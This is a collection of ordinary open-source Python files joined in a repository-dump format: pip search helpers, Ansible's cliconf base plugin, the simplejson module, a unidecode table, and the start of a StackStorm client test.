# each record has a unique name now, so we will convert the dict into a list sorted by score
package_list = sorted(packages.values(), key=lambda x: x['score'], reverse=True)
return package_list
def print_results(hits, name_column_width=25, terminal_width=None):
installed_packages = [p.project_name for p in pkg_resources.working_set]
for hit in hits:
name = hit['name']
summary = hit['summary'] or ''
if terminal_width is not None:
# wrap and indent summary to fit terminal
summary = textwrap.wrap(summary, terminal_width - name_column_width - 5)
summary = ('\n' + ' ' * (name_column_width + 3)).join(summary)
line = '%s - %s' % (name.ljust(name_column_width), summary)
try:
logger.notify(line)
if name in installed_packages:
dist = pkg_resources.get_distribution(name)
logger.indent += 2
try:
latest = highest_version(hit['versions'])
if dist.version == latest:
logger.notify('INSTALLED: %s (latest)' % dist.version)
else:
logger.notify('INSTALLED: %s' % dist.version)
logger.notify('LATEST: %s' % latest)
finally:
logger.indent -= 2
except UnicodeEncodeError:
pass
def compare_versions(version1, version2):
try:
return cmp(StrictVersion(version1), StrictVersion(version2))
# in case of abnormal version number, fall back to LooseVersion
except ValueError:
pass
try:
return cmp(LooseVersion(version1), LooseVersion(version2))
except TypeError:
# certain LooseVersion comparions raise due to unorderable types,
# fallback to string comparison
return cmp([str(v) for v in LooseVersion(version1).version],
[str(v) for v in LooseVersion(version2).version])
def highest_version(versions):
return reduce((lambda v1, v2: compare_versions(v1, v2) == 1 and v1 or v2), versions)
|
MiLk/ansible | refs/heads/devel | lib/ansible/plugins/cliconf/__init__.py | 44 | #
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import signal
from abc import ABCMeta, abstractmethod
from functools import wraps
from ansible.errors import AnsibleError, AnsibleConnectionFailure
from ansible.module_utils.six import with_metaclass
try:
from scp import SCPClient
HAS_SCP = True
except ImportError:
HAS_SCP = False
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
def enable_mode(func):
@wraps(func)
def wrapped(self, *args, **kwargs):
prompt = self.get_prompt()
if not str(prompt).strip().endswith('#'):
raise AnsibleError('operation requires privilege escalation')
return func(self, *args, **kwargs)
return wrapped
class CliconfBase(with_metaclass(ABCMeta, object)):
"""
A base class for implementing cli connections
.. note:: Unlike most of Ansible, nearly all strings in
:class:`CliconfBase` plugins are byte strings. This is because of
how close to the underlying platform these plugins operate. Remember
to mark literal strings as byte string (``b"string"``) and to use
:func:`~ansible.module_utils._text.to_bytes` and
:func:`~ansible.module_utils._text.to_text` to avoid unexpected
problems.
List of supported rpc's:
:get_config: Retrieves the specified configuration from the device
:edit_config: Loads the specified commands into the remote device
:get: Execute specified command on remote device
:get_capabilities: Retrieves device information and supported rpc methods
:commit: Load configuration from candidate to running
:discard_changes: Discard changes to candidate datastore
Note: List of supported rpc's for remote device can be extracted from
output of get_capabilities()
:returns: Returns output received from remote device as byte string
Usage:
from ansible.module_utils.connection import Connection
conn = Connection()
conn.get('show lldp neighbors detail'')
conn.get_config('running')
conn.edit_config(['hostname test', 'netconf ssh'])
"""
def __init__(self, connection):
self._connection = connection
def _alarm_handler(self, signum, frame):
raise AnsibleConnectionFailure('timeout waiting for command to complete')
def send_command(self, command, prompt=None, answer=None, sendonly=False):
"""Executes a cli command and returns the results
This method will execute the CLI command on the connection and return
the results to the caller. The command output will be returned as a
string
"""
timeout = self._connection._play_context.timeout or 30
signal.signal(signal.SIGALRM, self._alarm_handler)
signal.alarm(timeout)
display.display("command: %s" % command, log_only=True)
resp = self._connection.send(command, prompt, answer, sendonly)
signal.alarm(0)
return resp
def get_prompt(self):
"""Returns the current prompt from the device"""
return self._connection._matched_prompt
def get_base_rpc(self):
"""Returns list of base rpc method supported by remote device"""
return ['get_config', 'edit_config', 'get_capabilities', 'get']
@abstractmethod
def get_config(self, source='running', format='text'):
"""Retrieves the specified configuration from the device
This method will retrieve the configuration specified by source and
return it to the caller as a string. Subsequent calls to this method
will retrieve a new configuration from the device
:args:
arg[0] source: Datastore from which configuration should be retrieved eg: running/candidate/startup. (optional)
default is running.
arg[1] format: Output format in which configuration is retrieved
Note: Specified datastore should be supported by remote device.
:kwargs:
Keywords supported
:command: the command string to execute
:source: Datastore from which configuration should be retrieved
:format: Output format in which configuration is retrieved
:returns: Returns output received from remote device as byte string
"""
pass
@abstractmethod
def edit_config(self, commands):
"""Loads the specified commands into the remote device
This method will load the commands into the remote device. This
method will make sure the device is in the proper context before
send the commands (eg config mode)
:args:
arg[0] command: List of configuration commands
:kwargs:
Keywords supported
:command: the command string to execute
:returns: Returns output received from remote device as byte string
"""
pass
@abstractmethod
def get(self, *args, **kwargs):
"""Execute specified command on remote device
This method will retrieve the specified data and
return it to the caller as a string.
:args:
arg[0] command: command in string format to be executed on remote device
arg[1] prompt: the expected prompt generated by executing command.
This can be a string or a list of strings (optional)
arg[2] answer: the string to respond to the prompt with (optional)
arg[3] sendonly: bool to disable waiting for response, default is false (optional)
:kwargs:
:command: the command string to execute
:prompt: the expected prompt generated by executing command.
This can be a string or a list of strings
:answer: the string to respond to the prompt with
:sendonly: bool to disable waiting for response
:returns: Returns output received from remote device as byte string
"""
pass
@abstractmethod
def get_capabilities(self):
"""Retrieves device information and supported
rpc methods by device platform and return result
as a string
:returns: Returns output received from remote device as byte string
"""
pass
def commit(self, comment=None):
"""Commit configuration changes"""
return self._connection.method_not_found("commit is not supported by network_os %s" % self._play_context.network_os)
def discard_changes(self):
"Discard changes in candidate datastore"
return self._connection.method_not_found("discard_changes is not supported by network_os %s" % self._play_context.network_os)
def put_file(self, source, destination):
"""Copies file over scp to remote device"""
if not HAS_SCP:
self._connection.internal_error("Required library scp is not installed. Please install it using `pip install scp`")
ssh = self._connection._connect_uncached()
with SCPClient(ssh.get_transport()) as scp:
scp.put(source, destination)
def fetch_file(self, source, destination):
"""Fetch file over scp from remote device"""
if not HAS_SCP:
self._connection.internal_error("Required library scp is not installed. Please install it using `pip install scp`")
ssh = self._connection._connect_uncached()
with SCPClient(ssh.get_transport()) as scp:
scp.get(source, destination)
|
mou4e/zirconium | refs/heads/master | third_party/simplejson/__init__.py | 175 | r"""JSON (JavaScript Object Notation) <http://json.org> is a subset of
JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data
interchange format.
:mod:`simplejson` exposes an API familiar to users of the standard library
:mod:`marshal` and :mod:`pickle` modules. It is the externally maintained
version of the :mod:`json` library contained in Python 2.6, but maintains
compatibility with Python 2.4 and Python 2.5 and (currently) has
significant performance advantages, even without using the optional C
extension for speedups.
Encoding basic Python object hierarchies::
>>> import simplejson as json
>>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}])
'["foo", {"bar": ["baz", null, 1.0, 2]}]'
>>> print json.dumps("\"foo\bar")
"\"foo\bar"
>>> print json.dumps(u'\u1234')
"\u1234"
>>> print json.dumps('\\')
"\\"
>>> print json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)
{"a": 0, "b": 0, "c": 0}
>>> from StringIO import StringIO
>>> io = StringIO()
>>> json.dump(['streaming API'], io)
>>> io.getvalue()
'["streaming API"]'
Compact encoding::
>>> import simplejson as json
>>> json.dumps([1,2,3,{'4': 5, '6': 7}], separators=(',',':'))
'[1,2,3,{"4":5,"6":7}]'
Pretty printing::
>>> import simplejson as json
>>> s = json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=' ')
>>> print '\n'.join([l.rstrip() for l in s.splitlines()])
{
"4": 5,
"6": 7
}
Decoding JSON::
>>> import simplejson as json
>>> obj = [u'foo', {u'bar': [u'baz', None, 1.0, 2]}]
>>> json.loads('["foo", {"bar":["baz", null, 1.0, 2]}]') == obj
True
>>> json.loads('"\\"foo\\bar"') == u'"foo\x08ar'
True
>>> from StringIO import StringIO
>>> io = StringIO('["streaming API"]')
>>> json.load(io)[0] == 'streaming API'
True
Specializing JSON object decoding::
>>> import simplejson as json
>>> def as_complex(dct):
... if '__complex__' in dct:
... return complex(dct['real'], dct['imag'])
... return dct
...
>>> json.loads('{"__complex__": true, "real": 1, "imag": 2}',
... object_hook=as_complex)
(1+2j)
>>> from decimal import Decimal
>>> json.loads('1.1', parse_float=Decimal) == Decimal('1.1')
True
Specializing JSON object encoding::
>>> import simplejson as json
>>> def encode_complex(obj):
... if isinstance(obj, complex):
... return [obj.real, obj.imag]
... raise TypeError(repr(o) + " is not JSON serializable")
...
>>> json.dumps(2 + 1j, default=encode_complex)
'[2.0, 1.0]'
>>> json.JSONEncoder(default=encode_complex).encode(2 + 1j)
'[2.0, 1.0]'
>>> ''.join(json.JSONEncoder(default=encode_complex).iterencode(2 + 1j))
'[2.0, 1.0]'
Using simplejson.tool from the shell to validate and pretty-print::
$ echo '{"json":"obj"}' | python -m simplejson.tool
{
"json": "obj"
}
$ echo '{ 1.2:3.4}' | python -m simplejson.tool
Expecting property name: line 1 column 2 (char 2)
"""
__version__ = '2.6.2'
__all__ = [
'dump', 'dumps', 'load', 'loads',
'JSONDecoder', 'JSONDecodeError', 'JSONEncoder',
'OrderedDict', 'simple_first',
]
__author__ = 'Bob Ippolito <[email protected]>'
from decimal import Decimal
from decoder import JSONDecoder, JSONDecodeError
from encoder import JSONEncoder, JSONEncoderForHTML
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import ordered_dict
return ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
def _import_c_make_encoder():
try:
from simplejson._speedups import make_encoder
return make_encoder
except ImportError:
return None
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
use_decimal=True,
namedtuple_as_object=True,
tuple_as_array=True,
bigint_as_string=False,
item_sort_key=None,
)
def dump(obj, fp, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
**kw):
"""Serialize ``obj`` as a JSON formatted stream to ``fp`` (a
``.write()``-supporting file-like object).
If ``skipkeys`` is true then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, then the some chunks written to ``fp``
may be ``unicode`` instances, subject to normal Python ``str`` to
``unicode`` coercion rules. Unless ``fp.write()`` explicitly
understands ``unicode`` (as in ``codecs.getwriter()``) this is likely
to cause an error.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``)
in strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If *indent* is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *bigint_as_string* is true (default: ``False``), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise. Note that this is still a
lossy operation that will not round-trip correctly and should be used
sparingly.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
in alphabetical order by key. This option takes precedence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array
and not bigint_as_string and not item_sort_key and not kw):
iterable = _default_encoder.iterencode(obj)
else:
if cls is None:
cls = JSONEncoder
iterable = cls(skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding,
default=default, use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
**kw).iterencode(obj)
# could accelerate with writelines in some versions of Python, at
# a debuggability cost
for chunk in iterable:
fp.write(chunk)
def dumps(obj, skipkeys=False, ensure_ascii=True, check_circular=True,
allow_nan=True, cls=None, indent=None, separators=None,
encoding='utf-8', default=None, use_decimal=True,
namedtuple_as_object=True, tuple_as_array=True,
bigint_as_string=False, sort_keys=False, item_sort_key=None,
**kw):
"""Serialize ``obj`` to a JSON formatted ``str``.
If ``skipkeys`` is false then ``dict`` keys that are not basic types
(``str``, ``unicode``, ``int``, ``long``, ``float``, ``bool``, ``None``)
will be skipped instead of raising a ``TypeError``.
If ``ensure_ascii`` is false, then the return value will be a
``unicode`` instance subject to normal Python ``str`` to ``unicode``
coercion rules instead of being escaped to an ASCII ``str``.
If ``check_circular`` is false, then the circular reference check
for container types will be skipped and a circular reference will
result in an ``OverflowError`` (or worse).
If ``allow_nan`` is false, then it will be a ``ValueError`` to
serialize out of range ``float`` values (``nan``, ``inf``, ``-inf``) in
strict compliance of the JSON specification, instead of using the
JavaScript equivalents (``NaN``, ``Infinity``, ``-Infinity``).
If ``indent`` is a string, then JSON array elements and object members
will be pretty-printed with a newline followed by that string repeated
for each level of nesting. ``None`` (the default) selects the most compact
representation without any newlines. For backwards compatibility with
versions of simplejson earlier than 2.1.0, an integer is also accepted
and is converted to a string with that many spaces.
If ``separators`` is an ``(item_separator, dict_separator)`` tuple
then it will be used instead of the default ``(', ', ': ')`` separators.
``(',', ':')`` is the most compact JSON representation.
``encoding`` is the character encoding for str instances, default is UTF-8.
``default(obj)`` is a function that should return a serializable version
of obj or raise TypeError. The default simply raises TypeError.
If *use_decimal* is true (default: ``True``) then decimal.Decimal
will be natively serialized to JSON with full precision.
If *namedtuple_as_object* is true (default: ``True``),
:class:`tuple` subclasses with ``_asdict()`` methods will be encoded
as JSON objects.
If *tuple_as_array* is true (default: ``True``),
:class:`tuple` (and subclasses) will be encoded as JSON arrays.
If *bigint_as_string* is true (not the default), ints 2**53 and higher
or lower than -2**53 will be encoded as strings. This is to avoid the
rounding that happens in Javascript otherwise.
If specified, *item_sort_key* is a callable used to sort the items in
each dictionary. This is useful if you want to sort items other than
in alphabetical order by key. This option takes precendence over
*sort_keys*.
If *sort_keys* is true (default: ``False``), the output of dictionaries
will be sorted by item.
To use a custom ``JSONEncoder`` subclass (e.g. one that overrides the
``.default()`` method to serialize additional types), specify it with
the ``cls`` kwarg.
"""
# cached encoder
if (not skipkeys and ensure_ascii and
check_circular and allow_nan and
cls is None and indent is None and separators is None and
encoding == 'utf-8' and default is None and use_decimal
and namedtuple_as_object and tuple_as_array
and not bigint_as_string and not sort_keys
and not item_sort_key and not kw):
return _default_encoder.encode(obj)
if cls is None:
cls = JSONEncoder
return cls(
skipkeys=skipkeys, ensure_ascii=ensure_ascii,
check_circular=check_circular, allow_nan=allow_nan, indent=indent,
separators=separators, encoding=encoding, default=default,
use_decimal=use_decimal,
namedtuple_as_object=namedtuple_as_object,
tuple_as_array=tuple_as_array,
bigint_as_string=bigint_as_string,
sort_keys=sort_keys,
item_sort_key=item_sort_key,
**kw).encode(obj)
_default_decoder = JSONDecoder(encoding=None, object_hook=None,
object_pairs_hook=None)
def load(fp, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, namedtuple_as_object=True, tuple_as_array=True,
**kw):
"""Deserialize ``fp`` (a ``.read()``-supporting file-like object containing
a JSON document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
return loads(fp.read(),
encoding=encoding, cls=cls, object_hook=object_hook,
parse_float=parse_float, parse_int=parse_int,
parse_constant=parse_constant, object_pairs_hook=object_pairs_hook,
use_decimal=use_decimal, **kw)
def loads(s, encoding=None, cls=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, object_pairs_hook=None,
use_decimal=False, **kw):
"""Deserialize ``s`` (a ``str`` or ``unicode`` instance containing a JSON
document) to a Python object.
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
If *use_decimal* is true (default: ``False``) then it implies
parse_float=decimal.Decimal for parity with ``dump``.
To use a custom ``JSONDecoder`` subclass, specify it with the ``cls``
kwarg.
"""
if (cls is None and encoding is None and object_hook is None and
parse_int is None and parse_float is None and
parse_constant is None and object_pairs_hook is None
and not use_decimal and not kw):
return _default_decoder.decode(s)
if cls is None:
cls = JSONDecoder
if object_hook is not None:
kw['object_hook'] = object_hook
if object_pairs_hook is not None:
kw['object_pairs_hook'] = object_pairs_hook
if parse_float is not None:
kw['parse_float'] = parse_float
if parse_int is not None:
kw['parse_int'] = parse_int
if parse_constant is not None:
kw['parse_constant'] = parse_constant
if use_decimal:
if parse_float is not None:
raise TypeError("use_decimal=True implies parse_float=Decimal")
kw['parse_float'] = Decimal
return cls(encoding=encoding, **kw).decode(s)
def _toggle_speedups(enabled):
import simplejson.decoder as dec
import simplejson.encoder as enc
import simplejson.scanner as scan
c_make_encoder = _import_c_make_encoder()
if enabled:
dec.scanstring = dec.c_scanstring or dec.py_scanstring
enc.c_make_encoder = c_make_encoder
enc.encode_basestring_ascii = (enc.c_encode_basestring_ascii or
enc.py_encode_basestring_ascii)
scan.make_scanner = scan.c_make_scanner or scan.py_make_scanner
else:
dec.scanstring = dec.py_scanstring
enc.c_make_encoder = None
enc.encode_basestring_ascii = enc.py_encode_basestring_ascii
scan.make_scanner = scan.py_make_scanner
dec.make_scanner = scan.make_scanner
global _default_decoder
_default_decoder = JSONDecoder(
encoding=None,
object_hook=None,
object_pairs_hook=None,
)
global _default_encoder
_default_encoder = JSONEncoder(
skipkeys=False,
ensure_ascii=True,
check_circular=True,
allow_nan=True,
indent=None,
separators=None,
encoding='utf-8',
default=None,
)
def simple_first(kv):
"""Helper function to pass to item_sort_key to sort simple
elements to the top, then container elements.
"""
return (isinstance(kv[1], (list, dict, tuple)), kv[0])
|
Venturi/oldcms | refs/heads/master | env/lib/python2.7/site-packages/unidecode/x064.py | 252 | data = (
'Chan ', # 0x00
'Ge ', # 0x01
'Lou ', # 0x02
'Zong ', # 0x03
'Geng ', # 0x04
'Jiao ', # 0x05
'Gou ', # 0x06
'Qin ', # 0x07
'Yong ', # 0x08
'Que ', # 0x09
'Chou ', # 0x0a
'Chi ', # 0x0b
'Zhan ', # 0x0c
'Sun ', # 0x0d
'Sun ', # 0x0e
'Bo ', # 0x0f
'Chu ', # 0x10
'Rong ', # 0x11
'Beng ', # 0x12
'Cuo ', # 0x13
'Sao ', # 0x14
'Ke ', # 0x15
'Yao ', # 0x16
'Dao ', # 0x17
'Zhi ', # 0x18
'Nu ', # 0x19
'Xie ', # 0x1a
'Jian ', # 0x1b
'Sou ', # 0x1c
'Qiu ', # 0x1d
'Gao ', # 0x1e
'Xian ', # 0x1f
'Shuo ', # 0x20
'Sang ', # 0x21
'Jin ', # 0x22
'Mie ', # 0x23
'E ', # 0x24
'Chui ', # 0x25
'Nuo ', # 0x26
'Shan ', # 0x27
'Ta ', # 0x28
'Jie ', # 0x29
'Tang ', # 0x2a
'Pan ', # 0x2b
'Ban ', # 0x2c
'Da ', # 0x2d
'Li ', # 0x2e
'Tao ', # 0x2f
'Hu ', # 0x30
'Zhi ', # 0x31
'Wa ', # 0x32
'Xia ', # 0x33
'Qian ', # 0x34
'Wen ', # 0x35
'Qiang ', # 0x36
'Tian ', # 0x37
'Zhen ', # 0x38
'E ', # 0x39
'Xi ', # 0x3a
'Nuo ', # 0x3b
'Quan ', # 0x3c
'Cha ', # 0x3d
'Zha ', # 0x3e
'Ge ', # 0x3f
'Wu ', # 0x40
'En ', # 0x41
'She ', # 0x42
'Kang ', # 0x43
'She ', # 0x44
'Shu ', # 0x45
'Bai ', # 0x46
'Yao ', # 0x47
'Bin ', # 0x48
'Sou ', # 0x49
'Tan ', # 0x4a
'Sa ', # 0x4b
'Chan ', # 0x4c
'Suo ', # 0x4d
'Liao ', # 0x4e
'Chong ', # 0x4f
'Chuang ', # 0x50
'Guo ', # 0x51
'Bing ', # 0x52
'Feng ', # 0x53
'Shuai ', # 0x54
'Di ', # 0x55
'Qi ', # 0x56
'Sou ', # 0x57
'Zhai ', # 0x58
'Lian ', # 0x59
'Tang ', # 0x5a
'Chi ', # 0x5b
'Guan ', # 0x5c
'Lu ', # 0x5d
'Luo ', # 0x5e
'Lou ', # 0x5f
'Zong ', # 0x60
'Gai ', # 0x61
'Hu ', # 0x62
'Zha ', # 0x63
'Chuang ', # 0x64
'Tang ', # 0x65
'Hua ', # 0x66
'Cui ', # 0x67
'Nai ', # 0x68
'Mo ', # 0x69
'Jiang ', # 0x6a
'Gui ', # 0x6b
'Ying ', # 0x6c
'Zhi ', # 0x6d
'Ao ', # 0x6e
'Zhi ', # 0x6f
'Nie ', # 0x70
'Man ', # 0x71
'Shan ', # 0x72
'Kou ', # 0x73
'Shu ', # 0x74
'Suo ', # 0x75
'Tuan ', # 0x76
'Jiao ', # 0x77
'Mo ', # 0x78
'Mo ', # 0x79
'Zhe ', # 0x7a
'Xian ', # 0x7b
'Keng ', # 0x7c
'Piao ', # 0x7d
'Jiang ', # 0x7e
'Yin ', # 0x7f
'Gou ', # 0x80
'Qian ', # 0x81
'Lue ', # 0x82
'Ji ', # 0x83
'Ying ', # 0x84
'Jue ', # 0x85
'Pie ', # 0x86
'Pie ', # 0x87
'Lao ', # 0x88
'Dun ', # 0x89
'Xian ', # 0x8a
'Ruan ', # 0x8b
'Kui ', # 0x8c
'Zan ', # 0x8d
'Yi ', # 0x8e
'Xun ', # 0x8f
'Cheng ', # 0x90
'Cheng ', # 0x91
'Sa ', # 0x92
'Nao ', # 0x93
'Heng ', # 0x94
'Si ', # 0x95
'Qian ', # 0x96
'Huang ', # 0x97
'Da ', # 0x98
'Zun ', # 0x99
'Nian ', # 0x9a
'Lin ', # 0x9b
'Zheng ', # 0x9c
'Hui ', # 0x9d
'Zhuang ', # 0x9e
'Jiao ', # 0x9f
'Ji ', # 0xa0
'Cao ', # 0xa1
'Dan ', # 0xa2
'Dan ', # 0xa3
'Che ', # 0xa4
'Bo ', # 0xa5
'Che ', # 0xa6
'Jue ', # 0xa7
'Xiao ', # 0xa8
'Liao ', # 0xa9
'Ben ', # 0xaa
'Fu ', # 0xab
'Qiao ', # 0xac
'Bo ', # 0xad
'Cuo ', # 0xae
'Zhuo ', # 0xaf
'Zhuan ', # 0xb0
'Tuo ', # 0xb1
'Pu ', # 0xb2
'Qin ', # 0xb3
'Dun ', # 0xb4
'Nian ', # 0xb5
'[?] ', # 0xb6
'Xie ', # 0xb7
'Lu ', # 0xb8
'Jiao ', # 0xb9
'Cuan ', # 0xba
'Ta ', # 0xbb
'Han ', # 0xbc
'Qiao ', # 0xbd
'Zhua ', # 0xbe
'Jian ', # 0xbf
'Gan ', # 0xc0
'Yong ', # 0xc1
'Lei ', # 0xc2
'Kuo ', # 0xc3
'Lu ', # 0xc4
'Shan ', # 0xc5
'Zhuo ', # 0xc6
'Ze ', # 0xc7
'Pu ', # 0xc8
'Chuo ', # 0xc9
'Ji ', # 0xca
'Dang ', # 0xcb
'Suo ', # 0xcc
'Cao ', # 0xcd
'Qing ', # 0xce
'Jing ', # 0xcf
'Huan ', # 0xd0
'Jie ', # 0xd1
'Qin ', # 0xd2
'Kuai ', # 0xd3
'Dan ', # 0xd4
'Xi ', # 0xd5
'Ge ', # 0xd6
'Pi ', # 0xd7
'Bo ', # 0xd8
'Ao ', # 0xd9
'Ju ', # 0xda
'Ye ', # 0xdb
'[?] ', # 0xdc
'Mang ', # 0xdd
'Sou ', # 0xde
'Mi ', # 0xdf
'Ji ', # 0xe0
'Tai ', # 0xe1
'Zhuo ', # 0xe2
'Dao ', # 0xe3
'Xing ', # 0xe4
'Lan ', # 0xe5
'Ca ', # 0xe6
'Ju ', # 0xe7
'Ye ', # 0xe8
'Ru ', # 0xe9
'Ye ', # 0xea
'Ye ', # 0xeb
'Ni ', # 0xec
'Hu ', # 0xed
'Ji ', # 0xee
'Bin ', # 0xef
'Ning ', # 0xf0
'Ge ', # 0xf1
'Zhi ', # 0xf2
'Jie ', # 0xf3
'Kuo ', # 0xf4
'Mo ', # 0xf5
'Jian ', # 0xf6
'Xie ', # 0xf7
'Lie ', # 0xf8
'Tan ', # 0xf9
'Bai ', # 0xfa
'Sou ', # 0xfb
'Lu ', # 0xfc
'Lue ', # 0xfd
'Rao ', # 0xfe
'Zhi ', # 0xff
)
|
MineID/MineID | refs/heads/master | mineid/api/tests.py | 24123 | from django.test import TestCase
# Create your tests here.
|
Itxaka/st2 | refs/heads/master | st2client/tests/unit/test_commands.py | 7 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
import json
import logging
import argparse
import tempfile
import unittest2
from tests import base
from st2client import models
from st2client.utils import httpclient
from st2client.commands import resource
LOG = logging.getLogger(__name__)
class TestResourceCommand(unittest2.TestCase):
def __init__(self, *args, **kwargs):
super(TestResourceCommand, self).__init__(*args, **kwargs)
self.parser = argparse.ArgumentParser()
self.subparsers = self.parser.add_subparsers()
self.branch = resource.ResourceBranch(
base.FakeResource, 'Test Command', base.FakeApp(), self.subparsers)
@mock.patch.object(
httpclient.HTTPClient, 'get',
mock.MagicMock(return_value=base.FakeResponse(json.dumps(base.RESOURCES), 200, 'OK')))
def test_command_list(self):
args = self.parser.parse_args(['fakeresource', 'list'])
self.assertEqual(args.func, self.branch.commands['list'].run_and_print)
instances = self.branch.commands['list'].run(args)
